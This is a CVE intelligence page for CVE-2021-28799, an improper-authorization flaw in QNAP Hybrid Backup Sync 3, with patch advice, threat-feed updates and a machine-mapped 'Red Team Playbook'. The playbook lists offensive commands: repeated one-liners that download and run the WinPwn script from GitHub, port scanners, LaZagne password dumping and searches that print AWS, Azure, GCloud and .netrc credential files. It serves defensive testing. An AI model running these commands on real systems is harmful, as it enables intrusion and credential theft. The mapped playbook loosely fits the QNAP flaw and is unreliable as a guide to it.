CVE-2021-28799
Overview
This vulnerability is an improper authorization flaw in QNAP Hybrid Backup Sync 3 (HBS 3) that allows unauthorized access due to insufficient access control checks. The root cause lies in the failure to properly validate user permissions on specific management endpoints, particularly in the backup management CGI interface. The affected component is the HBS 3 application running on various QTS and QuTS platforms prior to specified versions.
Vulnerability Description
An improper authorization vulnerability has been reported to affect QNAP NAS running HBS 3 (Hybrid Backup Sync. ) If exploited, the vulnerability allows remote attackers to log in to a device. This issue affects: QNAP Systems Inc. HBS 3 versions prior to v16.0.0415 on QTS 4.5.2; versions prior to v3.0.210412 on QTS 4.3.6; versions prior to v3.0.210411 on QTS 4.3.4; versions prior to v3.0.210411 on QTS 4.3.3; versions prior to v16.0.0419 on QuTS hero h4.5.1; versions prior to v16.0.0419 on QuTScloud c4.5.1~c4.5.4. This issue does not affect: QNAP Systems Inc. HBS 2 . QNAP Systems Inc. HBS 1.3 .
Impact
An attacker can remotely execute arbitrary commands on the device without any authentication or user interaction, gaining full system access. This enables extraction of sensitive data, unauthorized system control, and potential lateral movement within the network. The compromise can lead to complete device takeover, data exfiltration, and disruption of backup operations critical to business continuity.
Solution
QNAP has released security updates addressing this issue in HBS 3 versions v16.0.0415 and later for QTS 4.5.2, v3.0.210412 and later for QTS 4.3.6, and corresponding versions for QuTS hero and QuTScloud. Administrators should apply these updates promptly as detailed in QNAP Security Advisory QSA-21-13 (https://www.qnap.com/en/security-advisory/QSA-21-13). No workarounds are recommended; updating to the patched versions is required to remediate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
An improper authorization vulnerability has been identified in the Hybrid Backup Sync (HBS 3) application utilized by QNAP NAS devices. This flaw arises from insufficient checks on user permissions, allowing unauthorized remote access to the affected systems. Specifically, the vulnerability affects multiple versions of HBS 3 across various QTS and QuTS platforms, which enables attackers to bypass authentication mechanisms. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a critical risk that could lead to significant security breaches.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with knowledge of the affected software versions could initiate a remote attack, leveraging the improper authorization to gain access to the device's administrative functions. This could be executed without physical access to the device, making it particularly dangerous for organizations that rely on QNAP NAS for data storage and backup. Scenarios may include unauthorized data manipulation, deletion, or exfiltration, which could have dire consequences for data integrity and confidentiality.
The real-world impact of this vulnerability is substantial, particularly for businesses that utilize QNAP NAS devices for critical operations. Unauthorized access could lead to data breaches, resulting in financial losses, reputational damage, and potential legal ramifications. The risk is amplified for organizations that store sensitive information, such as personal data or proprietary business information, as attackers could exploit this vulnerability to conduct further malicious activities, including ransomware deployment or data theft. The potential for widespread disruption and loss of trust among customers and stakeholders cannot be overstated.
To address this vulnerability, organizations should implement comprehensive detection and mitigation strategies. Regularly updating the HBS 3 application to the latest versions is crucial, as QNAP has released patches to rectify the authorization issues. Additionally, organizations should conduct routine security assessments and vulnerability scans to identify any instances of outdated software. Employing network segmentation and strict access controls can further minimize the risk of unauthorized access. Monitoring logs for unusual activity and implementing intrusion detection systems can also help in early detection of potential exploitation attempts.
In conclusion, the improper authorization vulnerability in QNAP's Hybrid Backup Sync poses a significant threat to the security of affected NAS devices. The potential for remote exploitation highlights the necessity for organizations to prioritize timely updates and robust security practices. By understanding the implications of this vulnerability and implementing effective mitigation strategies, businesses can better protect their data and maintain operational integrity in an increasingly complex threat landscape.
The CVSS score for CVE-2021-28799 has been adjusted upward to a perfect 10.0, reflecting a reassessment of the vulnerability’s criticality. This change underscores the absolute severity of the improper authorization flaw in QNAP’s Hybrid Backup Sync, confirming that successful exploitation grants attackers full remote access without any prerequisite authentication barriers. Despite a marginal decrease in the EPSS score, our telemetry indicates stable exploitation trends with no significant escalation or emergence of new exploit techniques. The inclusion of this vulnerability in the Known Exploited Vulnerabilities (KEV) catalog and its association with ransomware campaigns continue to validate its high-risk status. For defenders, this recalibration signals an imperative to maintain heightened vigilance, as the vulnerability remains a prime target for threat actors seeking to compromise NAS environments. The threat level remains critical, with the updated CVSS score reinforcing the urgency for detection and response capabilities to identify and mitigate exploitation attempts promptly.
Update 2 — July 04, 2026
CSURFACE threat intelligence has identified a slight increase in detection activity related to CVE-2021-28799, indicating a modest uptick in attempts to exploit this critical authorization vulnerability in QNAP NAS devices. While the overall exploit landscape remains stable with no new proof-of-concept exploits emerging, the observed rise in telemetry suggests that threat actors continue to probe and potentially leverage this weakness, particularly given its known association with ransomware campaigns. This subtle escalation underscores the persistence of adversaries targeting vulnerable NAS environments and reinforces the necessity for ongoing monitoring. Although the risk level remains critical, the incremental increase in exploitation attempts signals that defenders should maintain heightened situational awareness to promptly identify and respond to emerging threats exploiting this vulnerability.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Qnap | Hybrid Backup Sync | All |
cpe:2.3:a:qnap:hybrid_backup_sync:*:*:*:*:*:*:*:*
|
|
|
Qnap | Hybrid Backup Sync | All |
cpe:2.3:a:qnap:hybrid_backup_sync:*:*:*:*:*:*:*:*
|
|
|
Qnap | Hybrid Backup Sync | All |
cpe:2.3:a:qnap:hybrid_backup_sync:*:*:*:*:*:*:*:*
|
|
|
Qnap | Hybrid Backup Sync | All |
cpe:2.3:a:qnap:hybrid_backup_sync:*:*:*:*:*:*:*:*
|
|
|
Qnap | Hybrid Backup Sync | All |
cpe:2.3:a:qnap:hybrid_backup_sync:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-28799 |
| qnap.com |
GitHub CVE
x_refsource_MISC
|
https://www.qnap.com/en/security-advisory/QSA-21-13 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-28799 |